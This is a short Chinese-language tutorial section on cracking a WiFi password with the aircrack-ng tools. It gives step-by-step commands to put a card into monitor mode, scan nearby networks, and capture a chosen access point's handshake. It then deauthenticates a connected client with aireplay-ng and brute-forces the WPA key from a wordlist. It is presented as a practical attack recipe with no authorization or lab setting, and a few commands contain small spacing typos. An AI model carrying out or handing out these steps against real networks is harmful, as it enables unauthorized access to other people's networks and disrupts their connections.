2.1 破解wifi实战

(1). 关闭网络管理器,为了防止干扰

service  network-manager stop
airmon-ng check kill

(2). 查看本机电脑的无线网卡

ifconfig

或者

iwconfig

找到是否有wlan0无线网卡的,如果没有无线网卡请插入usb无线网卡。 如果是插入usb网卡请

ifconfig wlan0 up

加载无线网卡

(3). 激活网卡为监听(monitor)模式

airmon-ng start wlan0

得到监控模式下的设备名是mon0 有的可能是wlan0mon,请记住这个名字

(4). 探测周围无线网络

airodump-ng mon0

查看周边路由AP的信息。

个人经验一般信号强度大于-70的可以进行破解,大于-60就最好了,小于-70的不稳定,信号比较弱。(信号强度的绝对值越小表示信号越强)

(5). 选择要破解的WiFi,有针对性的进行抓握手包

airodump-ng --ignore-negative-one -w  /tmp/test.cap-c 11 --bssid 40:16:9F:76:E7:DE mon0

参数说明:-w 保存数据包的文件名 –c 信道 –bssid ap的mac地址 (注意test.cap会被重命名),也可以用其他工具抓包比如:wireshark、tcpdump,抓到握手包会有提示。

(6). 模拟目标wifi,想可信客户端发起断链攻击

为了顺利抓到握手包,我们需要使用DEAUTH攻击使已经连接的客户端断开并重新连接,以产生握手包。(注意:抓握手包破解必须有合法的客户端才行。)

攻击命令如下

aireplay-ng -0 3 -a B8:A3:86:63:B4:06 -c 00:18:1a:10:da:c9 -x 200 mon0

参数说明:-0 Deautenticate 冲突模式 3 发包次数 -x 发包速度

如果攻击成功,airodump-ng捕获handshake ,此时可以ctrl+c终止airodump-ng抓包。

(7). 通过字典暴力破解捕获到的加密密码

aircrack-ng-w pass-haoyong.txt test-03.cap

参数解释:-w 字典路径

如果字典中有对方的密码,那么经过一段时间就会破解成功,最终会出现 FOUND KEY!字样.

(8). 破解成功,恢复网络环境

service  network-manager start

results matching ""

    No results matching ""